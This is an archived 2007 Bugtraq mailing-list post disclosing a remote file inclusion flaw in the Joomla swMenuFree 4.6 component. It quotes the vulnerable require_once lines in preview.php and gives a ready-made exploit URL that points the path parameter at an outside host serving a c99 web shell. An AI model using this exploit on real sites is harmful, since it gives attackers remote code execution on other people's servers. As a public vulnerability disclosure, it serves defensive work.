lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071011164150.9675.qmail@securityfocus.com> Date: 11 Oct 2007 16:41:50 -0000 From: Guns@...0.com.ar To: bugtraq@...urityfocus.com Subject: Joomla! swMenuFree 4.6 Component Remote File Include #Joomla! swMenuFree 4.6 Component Remote File Include #Found by 0x90 #WwW.0x90.CoM.Ar #Download: http://www.swmenupro.com/index.php?option=com_remository&Itemid=298&func=fileinfo&id=12 #dork: No dork for script kiddies.. :) #BUG: preview.php:12: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/styles.php"); // <-- RFI preview.php:13: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/functions.php"); // <-- RFI #Expl0it: http://www.site.com/components/com_swmenufree/preview.php?mosConfig_absolute_path=http://scriptkiddie.com/c99haxor.txt? #Contact: Guns [at] 0x90 [dot] com [dot] ar